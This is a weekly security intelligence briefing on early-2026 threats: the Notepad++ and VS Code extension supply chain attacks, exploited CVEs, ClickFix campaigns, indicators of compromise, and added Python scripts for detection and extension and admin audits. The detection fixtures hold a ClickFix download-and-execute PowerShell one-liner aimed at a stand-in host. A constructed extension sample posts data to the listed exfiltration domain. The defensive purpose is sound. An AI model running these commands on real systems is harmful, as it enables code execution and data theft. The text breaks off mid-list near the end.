Weekly Security Intelligence Briefing
Classification: Public
Reporting Period: January 26 – February 2, 2026
Distribution: Security Operations, IT Leadership, Executive Team
Prepared By: Tech Jacks Solutions Security Intelligence
TJS Weekly Security Intelligence Briefing – Week of Feb 2nd 2026
1. Executive Summary
The week of January 26 – February 2, 2026 presents a critical risk posture driven by multiple nation-state supply chain attacks, widespread exploitation of ubiquitous software, and zero-day vulnerabilities across enterprise infrastructure. Chinese state-sponsored actors compromised Notepad++ update infrastructure for six months (June–December 2025), delivering the Chrysalis backdoor to telecommunications and financial sector targets across Asia-Pacific. Russian APTs (Sandworm, Turla, TEMP.Armageddon) and at least one China-linked group continued exploiting WinRAR CVE-2025-8088 through January 2026, targeting Ukrainian military and government entities among others.
The MaliciousCorgi campaign exposed 1.5 million developers to credential theft through trojanized VS Code extensions that remain live on Microsoft's marketplace. Ivanti disclosed CVE-2026-1281/CVE-2026-1340 (CVSS 9.8); a public PoC and in-the-wild exploitation attempts followed within 24 hours. Microsoft issued emergency patches for CVE-2026-21509, which Zscaler subsequently confirmed APT28 was exploiting against Ukrainian government and EU targets. Fortinet confirmed CVE-2026-24858 (CVSS 9.4), a FortiCloud SSO authentication bypass under active exploitation; Censys counts more than 3.2 million Fortinet devices with internet-exposed management interfaces, not all of which are confirmed vulnerable. ClickFix attacks now abuse the signed Microsoft App-V publishing script to deliver infostealers.
Key Statistics:
- 1.5M+ developers exposed via MaliciousCorgi VS Code extensions (still live)
- 6-month Notepad++ supply chain compromise (China/Lotus Blossom)
- 4+ state-linked groups (three Russian, one China-linked) exploiting WinRAR CVE-2025-8088 through January 2026
- 3.2M+ Fortinet devices with internet-exposed management interfaces (Censys); how many are unpatched for CVE-2026-24858 is not known
- 31.4 Tbps record DDoS attack (Aisuru botnet)
- 900K+ Chrome users exposed to conversation-stealing extensions
2. Critical Action Items
| Priority | Item | Affected Product | Deadline | Action |
|---|---|---|---|---|
| 1 | Notepad++ Supply Chain – Chinese APT Compromised Update Infrastructure | Notepad++ < 8.9.1 | Immediate | Update to 8.9.1+ manually; rotate credentials; assume compromise if auto-updated Jun–Dec 2025 |
| 2 | CVE-2025-8088 – WinRAR Path Traversal (Multi-APT Exploitation) | WinRAR < 7.13 | Immediate | Update to 7.13 manually (no auto-update); block RAR files with ADS |
| 3 | MaliciousCorgi – Trojanized VS Code Extensions (1.5M Installs) | VS Code Extensions | Immediate | Remove chatgpt-china and chat-moss; rotate ALL developer credentials |
| 4 | CVE-2026-1281/1340 – Ivanti EPMM RCE Zero-Days (PoC Available) | Ivanti EPMM 12.5–12.7 (on-premises) | Feb 1, 2026 (CISA KEV, CVE-2026-1281) | Apply Ivanti RPM patches; assume compromise if internet-exposed before patching |
| 5 | CVE-2026-24858 – FortiCloud SSO Auth Bypass (Active Exploitation) | FortiOS/FortiManager/FortiAnalyzer 7.0–7.6.5 | Jan 30, 2026 (CISA KEV) | Upgrade to 7.6.6/7.4.11/7.2.13/7.0.19; disable FortiCloud SSO until patched; audit admin accounts |
| 6 | CVE-2026-21509 – Microsoft Office Zero-Day (APT28 Weaponized) | Office 2016/2019/2021/365 | Feb 16, 2026 (CISA KEV) | Apply OOB updates; block RTF attachments |
| 7 | Chrome AI Extensions – ChatGPT/DeepSeek Conversation Theft | Chrome Extensions | Immediate | Remove suspicious AI extensions; audit installed extensions |
3. Key Security Stories
Story 1: Notepad++ Supply Chain Attack – Chinese APT Delivered Chrysalis Backdoor for 6 Months
On February 2, 2026, Notepad++ maintainer Don Ho disclosed that Chinese state-sponsored actors compromised the application’s hosting provider infrastructure from June through December 2025, selectively redirecting update traffic to deliver malware. Rapid7 attributed the campaign with medium-high confidence to Lotus Blossom (also tracked as Billbug/Spring Dragon), a Chinese APT active since 2009 targeting government, telecommunications, and critical infrastructure.
The Chrysalis backdoor supports 16 command capabilities including interactive shell access, file operations, and self-removal. Kaspersky identified three distinct infection chains with attackers rotating C2 servers and payloads monthly. Targets included organizations in Vietnam, Philippines, El Salvador, and Australia, primarily in telecommunications and financial services. The attack exploited insufficient signature verification in WinGUP, the Notepad++ updater component.
Affected Versions: All Notepad++ versions that auto-updated between June–December 2025
Attribution: Lotus Blossom/Billbug/Spring Dragon (China) – medium-high confidence
Current Status: Fixed in 8.8.9 (December 2025); version 8.9.2 will enforce signature validation
Remediation: Update to 8.9.1 via manual download from official site; rotate all credentials accessible from affected workstations; scan for Chrysalis IOCs
Source: TechCrunch, SecurityWeek, The Hacker News, Rapid7 Analysis
Story 2: WinRAR CVE-2025-8088 – Four Nation-State Groups Exploiting Path Traversal Through January 2026
Google Threat Intelligence Group reported on January 28 that Russian and Chinese APTs continue exploiting CVE-2025-8088 (CVSS 8.4), a WinRAR path traversal vulnerability patched in July 2025. The flaw allows malicious RAR archives to write files to arbitrary locations, including the Windows Startup folder, using NTFS Alternate Data Streams (ADS).
At least four state-linked groups are exploiting it: APT44/Sandworm delivers the NESTPACKER loader; Turla (Summit) deploys STOCKSTAY; TEMP.Armageddon (Carpathian) targets Ukrainian entities; and a China-linked APT delivers the PoisonIvy RAT. The exploit was sold by the threat actor "zeroplayer" for $80,000 on underground forums in July 2025, before public disclosure. GTIG observed continued exploitation through late January 2026 against the Ukrainian military, Indonesian organizations, and the Latin American hospitality sector.
Affected Versions: WinRAR prior to 7.13 (patched July 30, 2025)
Exploitation Status: Active by 4+ nation-state groups; CISA KEV listed
Remediation: Update to WinRAR 7.13 manually (no auto-update mechanism); consider blocking RAR attachments with ADS at email gateway
Source: Google Cloud Blog, SecurityWeek, BleepingComputer
Story 3: MaliciousCorgi – 1.5 Million Developers Exposed via Trojanized VS Code Extensions
Koi Security disclosed on January 22 that two VS Code extensions with 1.5 million combined installations contain identical spyware exfiltrating developer data to servers in China. The extensions “ChatGPT – 中文版” (1.34M installs, publisher: WhenSunset) and “ChatMoss/CodeMoss” (150K installs, publisher: zhukunpeng) remained live on Microsoft’s VS Code Marketplace as of February 2, 2026, despite disclosure.
The malware operates through three channels: real-time file monitoring capturing every opened file, remote-triggered file harvesting of up to 50 workspace files on command, and hidden analytics SDKs (Zhuge.io, GrowingIO, TalkingData, Baidu Analytics). All file contents are Base64-encoded and transmitted to aihao123[.]cn. The extensions function as legitimate AI coding assistants, avoiding suspicion while continuously exfiltrating source code, API keys, .env files, and SSH keys.
Affected Products: VS Code extensions whensunset.chatgpt-china, zhukunpeng.chat-moss
Exploitation Status: Active; extensions still available on Marketplace as of Feb 2
Remediation: Remove extensions immediately; rotate ALL credentials (API keys, NPM tokens, GitHub tokens, SSH keys); audit .env files and credential stores for exposure
Source: Koi Security Research, BleepingComputer, The Hacker News
Story 4: Ivanti EPMM Zero-Days Under Active Exploitation (CVE-2026-1281, CVE-2026-1340)
On January 29, 2026, Ivanti disclosed two critical code injection vulnerabilities in Endpoint Manager Mobile (EPMM) that allow unauthenticated remote code execution. Both CVE-2026-1281 and CVE-2026-1340 carry CVSS 9.8 ratings. CVE-2026-1281 was immediately added to CISA’s KEV catalog with an unusually short remediation deadline of February 1 (three days), signaling the severity of ongoing exploitation.
watchTowr researchers published technical analysis and proof-of-concept code on January 30. Shadowserver observed exploitation attempts from at least 13 source IPs within 24 hours of disclosure, with approximately 1,600 EPMM instances exposed globally. Attackers are installing web shells and establishing reverse shells; the exploitation requests target /mifs/c/aftstore/fob/ and /mifs/c/appstore/fob/.
Affected Versions: EPMM 12.5.x, 12.6.x, 12.7.x (on-premises only; cloud MDM not affected)
Exploitation Status: Actively exploited; public PoC available
Remediation: Apply Ivanti's RPM patches for the affected 12.5/12.6/12.7 branches; if the appliance was internet-exposed before patching, assume compromise and initiate IR (review httpd access logs for the two paths above and check for web shells)
Source: Rapid7 Blog, Ivanti Advisory, CISA KEV
Story 5: ClickFix Attacks Expand with Microsoft App-V Script Abuse
Blackpoint Cyber reported on January 26 that ClickFix social engineering campaigns now abuse the signed Microsoft Application Virtualization (App-V) publishing script, SyncAppvPublishingServer.vbs, as a living-off-the-land binary (LOLBin). Fake CAPTCHA pages trick users into pasting malicious commands into the Windows Run dialog; the script then proxies PowerShell execution through a trusted, signed Microsoft component to deliver the Amatera infostealer.
Microsoft reports that ClickFix techniques accounted for 47% of the attacks it observed in recent months. The campaigns target social media creators with fake "verification badge" and "account suspension" lures. A traffic distribution system, ErrTraffic, was launched specifically to feed ClickFix operations, and ClickFix builders are advertised on hacker forums for $200–$1,500/month.
Attack Vector: Fake CAPTCHA → clipboard hijack → Windows Run dialog → SyncAppvPublishingServer.vbs execution
Variants: JackFix, CrashFix
Remediation: Restrict the Windows Run dialog via GPO where feasible; disable the App-V client if unused and block SyncAppvPublishingServer.vbs with application control (the script remains in System32 whether or not App-V is enabled); enable PowerShell Script Block Logging; train users on clipboard-based attacks
Source: BleepingComputer, The Hacker News, Microsoft Security Blog
Story 6: Chrome Extensions Stealing ChatGPT and DeepSeek Conversations
OX Security disclosed in late January that malicious Chrome extensions are harvesting complete conversation histories from ChatGPT and DeepSeek AI platforms. The extensions “Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI” (600K users) and “AI Sidebar with Deepseek, ChatGPT, Claude” (300K users) exfiltrate all AI conversations and browsed URLs to C2 servers every 30 minutes.
The malicious extensions impersonate the legitimate "Chat with all AI models" extension from AITOPIA (1M users). Secure Annex researchers dubbed the technique "Prompt Poaching". In a related finding, the Urban VPN Proxy extension was caught performing the same exfiltration. The extensions remained on the Chrome Web Store at the time of disclosure.
Affected Products: Chrome browser with malicious AI assistant extensions
Data Exfiltrated: Complete ChatGPT/DeepSeek conversations, all browsed URLs
Remediation: Audit installed Chrome extensions; remove suspicious AI extensions; review browser extension permissions; consider enterprise extension allowlisting
Source: OX Security Research, BleepingComputer, Secure Annex
Story 7: APT28 Weaponizes Microsoft Office Zero-Day Against Ukraine and EU
Microsoft issued an emergency out-of-band patch on January 26 for CVE-2026-21509 (CVSS 7.8), an actively exploited security feature bypass in Microsoft Office. By January 29, Zscaler confirmed APT28 (Fancy Bear) was exploiting the vulnerability in phishing campaigns targeting Ukrainian government entities and EU institutions, delivering the MiniDoor backdoor via weaponized RTF files with C2 communications routed through FileCloud storage API.
Affected Versions: Office 2016, 2019, LTSC 2021, LTSC 2024, Microsoft 365 Apps
Exploitation Status: Actively exploited by APT28; no public PoC
Remediation: Apply OOB updates; block RTF attachments at email gateway
Source: Microsoft Advisory, Help Net Security, CISA KEV
Story 8: Fortinet FortiCloud SSO Zero-Day Enables Cross-Account Access (CVE-2026-24858)
Fortinet confirmed CVE-2026-24858 (CVSS 9.4) on January 27, revealing that an attacker with a FortiCloud account could authenticate via FortiCloud SSO to devices registered under other customers' accounts. Arctic Wolf first observed automated attacks creating rogue admin accounts on January 15. Censys identified over 3.2 million Fortinet devices with internet-exposed management interfaces; that figure measures exposure, not confirmed vulnerability, but any exposed device that had FortiCloud SSO enabled should be checked for the rogue admin usernames listed in Section 7.
Affected Versions: FortiOS 7.0.x–7.6.5, FortiManager 7.0.x–7.6.5, FortiAnalyzer 7.0.x–7.6.5
Exploitation Status: Actively exploited; CISA KEV deadline Jan 30
Remediation: Upgrade to FortiOS 7.6.6, 7.4.11, 7.2.13, or 7.0.19; disable FortiCloud SSO if unable to patch
Source: Fortinet PSIRT FG-IR-26-060, CISA Alert
Story 9: Sandworm Targets Polish Energy Infrastructure with DynoWiper
CERT Polska disclosed coordinated attacks, dated December 29, 2025, against more than 30 wind farms and solar installations and a combined heat and power (CHP) plant serving 500,000 customers. ESET attributed the attacks with medium confidence to Sandworm (APT44/ELECTRUM). The DynoWiper malware overwrites files with output from a Mersenne Twister PRNG. Initial access was through RTUs that still used default credentials.
Attribution: Sandworm/ELECTRUM/APT44 (Russia-linked) – medium confidence
Impact: Communication disruption; no physical power outages
Source: Dragos Blog, Polish Government
4. CISA KEV & Critical CVE Table
| CVE | Product | CVSS | Status | CISA Deadline | Description |
|---|---|---|---|---|---|
| CVE-2026-1281 | Ivanti EPMM | 9.8 | Actively Exploited | Feb 1, 2026 | Unauthenticated RCE via code injection |
| CVE-2026-24858 | Fortinet FortiOS | 9.4 | Actively Exploited | Jan 30, 2026 | FortiCloud SSO authentication bypass |
| CVE-2025-8088 | WinRAR | 8.4 | Actively Exploited | CISA KEV Listed | Path traversal via ADS; multi-APT exploitation |
| CVE-2026-21509 | Microsoft Office | 7.8 | Actively Exploited | Feb 16, 2026 | OLE mitigation bypass (APT28 weaponized) |
| CVE-2026-24061 | GNU InetUtils | 8.7 | Actively Exploited | Feb 16, 2026 | Telnetd authentication bypass |
| CVE-2026-1340 | Ivanti EPMM | 9.8 | PoC Available | N/A | Unauthenticated RCE (companion to 1281) |
| CVE-2026-23550 | WordPress Modular DS | 10.0 | Actively Exploited | Pending | Unauthenticated privilege escalation |
| CVE-2026-1470 | n8n Workflow | 9.9 | PoC Available | N/A | Eval injection sandbox bypass |
| N/A | Notepad++ | High | Supply Chain | N/A | 6-month hosting compromise (Lotus Blossom) |
| N/A | VS Code Extensions | High | Active | N/A | MaliciousCorgi credential theft (1.5M users) |
| N/A | Chrome Extensions | High | Active | N/A | AI conversation theft (900K+ users) |
5. Supply Chain & Developer Tool Threats
Active Campaigns This Week
| Campaign | Target | Scale | Status |
|---|---|---|---|
| Notepad++ (Lotus Blossom) | Developers, enterprises | 6-month compromise | Hosting fix in 8.8.9; update to 8.9.1 |
| MaliciousCorgi | VS Code developers | 1.5M installs | Extensions still live |
| GlassWorm (Open VSX) | VS Code developers | 35,800+ installs | Removed; C2 active |
| Chrome AI Extensions | ChatGPT/DeepSeek users | 900K+ users | Extensions still live |
| PackageGate | npm/pnpm/Bun users | Ecosystem-wide | Vulnerabilities disclosed |
Developer Environment Hardening Priorities
- Audit all IDE extensions – Remove any extension not explicitly required
- Verify update sources – Download updates from official sources only; verify signatures
- Credential rotation – If any supply chain exposure possible, rotate all tokens/keys
- Extension allowlisting – Implement enterprise policies restricting extension installation
6. Phishing & Social Engineering Alert
ClickFix Campaign Surge
Microsoft Threat Intelligence reports that ClickFix techniques accounted for 47% of the attacks it observed in recent months. The attack flow: fake CAPTCHA → malicious script copied to clipboard → user pastes into the Windows Run dialog → LOLBin execution.
Detection Indicators:
- Unexpected `SyncAppvPublishingServer.vbs` execution (wscript.exe or cscript.exe with that script on the command line)
- PowerShell spawned from mshta.exe or wscript.exe
- Clipboard manipulation via JavaScript on the lure page
Mitigation:
- Disable Windows Run dialog via Group Policy where feasible
- Enable PowerShell Script Block Logging
- Deploy browser isolation for untrusted sites
- User awareness training on clipboard-based attacks
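The detection indicators above, and the monitoring step in item 4 of the Helpful 5 below, reduce to three process-creation rules. The following is an added example written for this briefing, not a Microsoft or Blackpoint signature: it runs those rules over records carrying the fields a Sysmon Event ID 1 or Security 4688 event provides (image, parent image, command line, user). The SAMPLE_EVENTS are constructed; the assumption that a Win+R Run dialog launch appears as a child of explorer.exe, and the PAYLOAD_MARKERS heuristic, are this example's own choices and will need tuning (a logon script that spawns PowerShell from wscript.exe also matches rule 2).

```python
"""ClickFix / App-V LOLBin detection over process-creation events.

Added example for the detection indicators in this briefing; not a
vendor signature. Each event carries the fields a Sysmon Event ID 1 or
Security 4688 record provides. SAMPLE_EVENTS are constructed.
Assumptions: a Win+R Run dialog launch shows up as a child of
explorer.exe; PAYLOAD_MARKERS is a starting heuristic, not exhaustive.
"""
import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Strings that tend to appear in the pasted ClickFix one-liner (example heuristic).
PAYLOAD_MARKERS = ("-enc", "-encodedcommand", "iex", "invoke-expression", "downloadstring", "http")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path; works on any host OS."""
    return ntpath.basename(path).lower()


def detect(events):
    """Return one finding per (event, rule) match; an event can match several rules."""
    findings = []
    for i, ev in enumerate(events):
        image = basename(ev["image"])
        parent = basename(ev["parent_image"])
        cmd = ev.get("command_line", "").lower()
        matched = []
        # Rule 1: the signed App-V publishing script is run at all. The script
        # passes whatever follows "n;" on its command line to PowerShell.
        if image in {"wscript.exe", "cscript.exe"} and "syncappvpublishingserver.vbs" in cmd:
            matched.append("appv_publishing_script")
        # Rule 2: PowerShell whose parent is a script host (mshta/wscript/cscript).
        if image in {"powershell.exe", "pwsh.exe"} and parent in SCRIPT_HOSTS:
            matched.append("powershell_from_script_host")
        # Rule 3: a shell launched from explorer.exe (Run dialog, assumption above)
        # whose command line carries download / encoded-command markers.
        if parent == "explorer.exe" and image in SHELLS and any(m in cmd for m in PAYLOAD_MARKERS):
            matched.append("run_dialog_payload")
        for rule in matched:
            findings.append({"index": i, "rule": rule, "image": image,
                             "parent": parent, "user": ev.get("user")})
    return findings


# Constructed events: a ClickFix chain (0-3) and benign noise (4-6).
# example.invalid is a reserved name; the -enc blob is not a real payload.
SAMPLE_EVENTS = [
    {"user": "CORP\\alice", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\wscript.exe",
     "command_line": "wscript.exe C:\\Windows\\System32\\SyncAppvPublishingServer.vbs "
                     "\"n;iex (New-Object Net.WebClient).DownloadString('http://example.invalid/cf')\""},
    {"user": "CORP\\alice", "parent_image": "C:\\Windows\\System32\\wscript.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -NoProfile -WindowStyle Hidden -Command "
                     "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/cf')"},
    {"user": "CORP\\bob", "parent_image": "C:\\Windows\\System32\\mshta.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -w hidden -enc SQBFAFgA"},
    {"user": "CORP\\bob", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -w hidden -enc SQBFAFgA"},
    {"user": "CORP\\alice", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe",
     "command_line": "notepad.exe C:\\Users\\alice\\notes.txt"},
    {"user": "NT AUTHORITY\\SYSTEM", "parent_image": "C:\\Windows\\System32\\services.exe",
     "image": "C:\\Windows\\System32\\svchost.exe", "command_line": "svchost.exe -k netsvcs"},
    {"user": "CORP\\carol", "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"event {f['index']}: {f['rule']}  {f['parent']} -> {f['image']}  ({f['user']})")
```

Rule 1 is the high-fidelity one: there is almost no legitimate reason for an interactive user to run SyncAppvPublishingServer.vbs, so it can go straight to an alert, while rules 2 and 3 are better treated as hunting queries until the environment's baseline (logon scripts, admin habits) is known.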
7. Indicators of Compromise
Notepad++ / Chrysalis Backdoor
C2 Domains:
- api.skycloudcenter[.]com
- api.wiresguard[.]com
Malicious Update Source (historical):
- 45.76.155[.]202/update/update.exe
File Indicators:
- BluetoothService.exe (renamed Bitdefender loader)
- log.dll (malicious sideloaded DLL)
Behavioral:
- DLL sideloading via renamed AV executable
- Microsoft Warbird API abuse for obfuscation
WinRAR CVE-2025-8088 Campaign
Malware Families:
- NESTPACKER (APT44/Sandworm)
- STOCKSTAY (Turla)
- PoisonIvy (China-linked APT)
- XWorm, AsyncRAT, Lumma Stealer (cybercrime)
TTPs:
- RAR archives with NTFS Alternate Data Streams
- Files written to: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
- Geopolitical lures: Ukraine conflict, Indonesian government
MaliciousCorgi VS Code Extensions
Extension IDs (REMOVE IMMEDIATELY):
- whensunset.chatgpt-china
- zhukunpeng.chat-moss
Exfiltration Server:
- aihao123[.]cn
Analytics SDKs (hidden iframes):
- Zhuge.io, GrowingIO, TalkingData, Baidu Analytics
Behavioral:
- Base64-encoded file contents transmitted
- Up to 50 workspace files harvested on command
Fortinet CVE-2026-24858
Rogue Admin Usernames:
- audit, backup, itadmin, secadmin, support
- backupadmin, deploy, remoteadmin, security, sv
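To check a fleet for the rogue accounts above, the following added example (not Fortinet or Arctic Wolf tooling) parses the `config system admin` section of a FortiOS CLI configuration backup and flags any administrator whose username is on the rogue list or absent from an approved baseline, noting the access profile and whether trusted hosts restrict the account. The SAMPLE_CONFIG is constructed for the demo; its `config`/`edit`/`next`/`end` layout follows the FortiOS export format, and the nested `gui-dashboard` block is there to show that the parser only treats depth-1 `edit` lines as accounts.

```python
"""Audit FortiOS admin accounts from a configuration backup.

Added example, not Fortinet or Arctic Wolf tooling. Parses the
`config system admin` section of a FortiOS CLI config export and flags
usernames that match the CVE-2026-24858 rogue-admin IOC list or that are
absent from an approved baseline. SAMPLE_CONFIG is constructed for the demo.
"""
import re

# Usernames reported for rogue accounts created via the FortiCloud SSO bypass.
ROGUE_USERNAMES = {
    "audit", "backup", "itadmin", "secadmin", "support",
    "backupadmin", "deploy", "remoteadmin", "security", "sv",
}

CONFIG_RE = re.compile(r"^\s*config\s+(.+?)\s*$")
EDIT_RE = re.compile(r'^\s*edit\s+"?(.*?)"?\s*$')
ACCPROFILE_RE = re.compile(r'^\s*set\s+accprofile\s+"?(.*?)"?\s*$')
TRUSTHOST_RE = re.compile(r"^\s*set\s+trusthost\d+\s+(.+?)\s*$")


def parse_admins(config_text: str) -> list:
    """Return [{name, accprofile, trusthosts}] for each entry in config system admin.

    Nested `config ... end` blocks inside an entry are skipped by tracking
    depth, so only depth-1 `edit` lines become accounts.
    """
    admins, in_admin, depth, current = [], False, 0, None
    for raw in config_text.splitlines():
        line = raw.strip()
        if not in_admin:
            m = CONFIG_RE.match(line)
            if m and m.group(1) == "system admin":
                in_admin, depth = True, 1
            continue
        if CONFIG_RE.match(line):
            depth += 1
            continue
        if line == "end":
            depth -= 1
            if depth == 0:
                in_admin = False
            continue
        if depth != 1:
            continue  # inside a nested block; ignore its edit/set/next lines
        m = EDIT_RE.match(line)
        if m:
            current = {"name": m.group(1), "accprofile": None, "trusthosts": []}
            admins.append(current)
            continue
        if line == "next":
            current = None
            continue
        if current is None:
            continue
        m = ACCPROFILE_RE.match(line)
        if m:
            current["accprofile"] = m.group(1)
            continue
        m = TRUSTHOST_RE.match(line)
        if m:
            current["trusthosts"].append(m.group(1))
    return admins


def audit_admins(admins: list, baseline: set) -> list:
    """Flag accounts on the rogue list or outside the baseline; note missing trusthost."""
    findings = []
    for a in admins:
        reasons = []
        if a["name"].lower() in ROGUE_USERNAMES:
            reasons.append("username matches CVE-2026-24858 rogue-admin IOC list")
        if a["name"] not in baseline:
            reasons.append("not in approved admin baseline")
        if reasons and not a["trusthosts"]:
            reasons.append("no trusthost restriction (reachable from any source)")
        if reasons:
            findings.append({"name": a["name"], "accprofile": a["accprofile"], "reasons": reasons})
    return findings


# Constructed FortiOS config excerpt; hostnames and addresses are placeholders.
SAMPLE_CONFIG = """\
config system global
    set hostname "fw-edge-01"
end
config system admin
    edit "admin"
        set accprofile "super_admin"
        set vdom "root"
        set trusthost1 10.10.0.0 255.255.255.0
        config gui-dashboard
            edit 1
                set name "Status"
            next
        end
    next
    edit "noc-ro"
        set accprofile "prof_readonly"
        set vdom "root"
    next
    edit "itadmin"
        set accprofile "super_admin"
        set vdom "root"
    next
end
config system interface
    edit "port1"
        set ip 192.0.2.1 255.255.255.0
    next
end
"""

if __name__ == "__main__":
    for f in audit_admins(parse_admins(SAMPLE_CONFIG), baseline={"admin", "noc-ro"}):
        print(f"{f['name']} ({f['accprofile']}): " + "; ".join(f["reasons"]))
```

Run it against `show system admin` or full-config backups pulled from every device; a hit on the rogue list is an incident, and an unknown super_admin account without trusthost restrictions deserves the same treatment even if its name is not on the list, since the usernames will change.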
APT28 CVE-2026-21509 Campaign
Malware: MiniDoor backdoor
C2: FileCloud (filen.io) API
Document Lures:
- "Consultation_Topics_Ukraine(Final).doc"
- Ukrainian weather bulletins
- EU consultation documents
GlassWorm Supply Chain
C2 Infrastructure:
- Solana RPC endpoints (various)
- Google Calendar API (backup C2)
Compromised Extensions (oorzc namespace):
- oorzc.ssh-tools
Behavioral:
- Solana blockchain transaction memos for C2
- macOS Keychain access attempts
- FortiClient VPN config theft
8. Helpful 5: High-Value, Low-Effort Mitigations
1. Developer Environments: Emergency Extension Audit
Why: MaliciousCorgi (1.5M users) and GlassWorm (35K+ users) actively stealing credentials; extensions remain live
How:
- Search VS Code: in the Extensions view, filter on `@installed whensunset`, `@installed zhukunpeng` and `@installed oorzc`; remove immediately if found
- Rotate ALL credentials: API keys, NPM/GitHub tokens, SSH keys, database passwords
- Review `~/.ssh/`, `.env` files, and credential stores for exposure
- Implement extension allowlisting policy
Framework Alignment: CIS Control 2.7, NIST CSF PR.DS-6, ISO 27001 A.14.2.5
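For more than a handful of workstations the Extensions-view search above does not scale, so here is a scripted version of the audit for Story 3 (MaliciousCorgi) and the GlassWorm entry in Section 5. It is an added example, not Koi Security, Socket or marketplace tooling: it walks a VS Code extensions directory (normally ~/.vscode/extensions, where each extension sits in a publisher.name-version folder), builds the marketplace ID from package.json, and flags the two MaliciousCorgi IDs, anything in the oorzc publisher namespace, and any bundled JavaScript that references the aihao123[.]cn exfiltration host. The three extensions that build_sample_root() writes to a temporary directory are constructed for the demo.

```python
"""Audit installed VS Code extensions against this week's IOCs.

Added example; not Koi Security, Socket or marketplace tooling. Walks a
VS Code extensions directory, builds each marketplace ID from
package.json and flags MaliciousCorgi IDs, the oorzc (GlassWorm)
publisher namespace, and bundled .js referencing the exfil host.
build_sample_root() creates constructed extensions in a temp dir.
"""
import json
import sys
import tempfile
from pathlib import Path

MALICIOUS_IDS = {"whensunset.chatgpt-china", "zhukunpeng.chat-moss"}
MALICIOUS_PUBLISHERS = {"oorzc"}
EXFIL_HOSTS = ("aihao123.cn",)  # refanged from the IOC list


def extension_id(pkg: dict) -> str:
    """Marketplace ID is <publisher>.<name>; compared case-insensitively."""
    return f"{pkg.get('publisher', '')}.{pkg.get('name', '')}".lower()


def scan_bundle(ext_dir: Path) -> list:
    """Exfil hosts referenced by any JavaScript shipped with the extension."""
    hits = set()
    for js in ext_dir.rglob("*.js"):
        text = js.read_text(encoding="utf-8", errors="ignore")
        hits.update(h for h in EXFIL_HOSTS if h in text)
    return sorted(hits)


def audit_extensions(root: Path) -> list:
    """Return [{id, path, reasons}] for every extension under root that trips a check."""
    findings = []
    for manifest in sorted(root.glob("*/package.json")):
        try:
            pkg = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest; not an IOC match by itself
        ext_id = extension_id(pkg)
        reasons = []
        if ext_id in MALICIOUS_IDS:
            reasons.append("MaliciousCorgi extension ID")
        if ext_id.split(".", 1)[0] in MALICIOUS_PUBLISHERS:
            reasons.append("GlassWorm publisher namespace")
        hosts = scan_bundle(manifest.parent)
        if hosts:
            reasons.append("bundle references exfil host " + ", ".join(hosts))
        if reasons:
            findings.append({"id": ext_id, "path": str(manifest.parent), "reasons": reasons})
    return findings


def build_sample_root() -> Path:
    """Constructed extension folders for the demo; not real extension contents."""
    root = Path(tempfile.mkdtemp(prefix="vscode-ext-audit-"))
    samples = {
        "WhenSunset.chatgpt-china-1.0.0": (
            {"publisher": "WhenSunset", "name": "chatgpt-china"},
            "fetch('https://aihao123.cn/upload', {method: 'POST'});"),
        "oorzc.ssh-tools-0.1.2": ({"publisher": "oorzc", "name": "ssh-tools"}, "module.exports = {};"),
        "ms-python.python-2026.1.0": ({"publisher": "ms-python", "name": "python"}, "module.exports = {};"),
    }
    for folder, (pkg, js) in samples.items():
        d = root / folder
        (d / "out").mkdir(parents=True)
        (d / "package.json").write_text(json.dumps(pkg), encoding="utf-8")
        (d / "out" / "extension.js").write_text(js, encoding="utf-8")
    return root


if __name__ == "__main__":
    root = Path(sys.argv[1]).expanduser() if len(sys.argv) > 1 else build_sample_root()
    for f in audit_extensions(root):
        print(f"{f['id']}  {f['path']}\n    " + "\n    ".join(f["reasons"]))
```

Point it at the real directory with `python audit.py ~/.vscode/extensions` (remote-SSH and container hosts keep their own copy under ~/.vscode-server, and Open VSX based editors use their own paths). The host-string check is deliberately naive; obfuscated bundles will hide the domain, so treat the ID and publisher checks as the authoritative ones and the bundle scan as a bonus.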
2. Notepad++: Manual Update and Compromise Assessment
Why: 6-month supply chain compromise affecting unknown number of organizations
How:
- Check current version: Help → About (vulnerable if < 8.8.9)
- Download 8.9.1 directly from notepad-plus-plus.org (verify signature)
- If auto-updated between June–December 2025, assume potential compromise
- Scan for Chrysalis IOCs (BluetoothService.exe, log.dll, C2 domains)
- Rotate credentials accessible from affected workstations
Framework Alignment: CIS Control 2.3, NIST CSF PR.IP-12, ISO 27001 A.12.6.1
3. WinRAR: Update and Email Gateway Controls
Why: 4+ nation-state groups actively exploiting; no auto-update mechanism
How:
- Download WinRAR 7.13 from rarlab.com (verify hash)
- Deploy via SCCM/Intune to all endpoints
- Configure email gateway to quarantine RAR files with ADS
- Enable file type blocking for .rar attachments from external senders
- User awareness: Ukraine/military themed phishing
Framework Alignment: CIS Control 9.5, NIST CSF PR.AT-1, MITRE ATT&CK T1566.001
4. ClickFix Defense: PowerShell and Run Dialog Restrictions
Why: 47% of observed attacks use ClickFix; abuses legitimate Windows components
How:
- GPO: Disable the Windows Run dialog for standard users (HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = 1, DWORD)
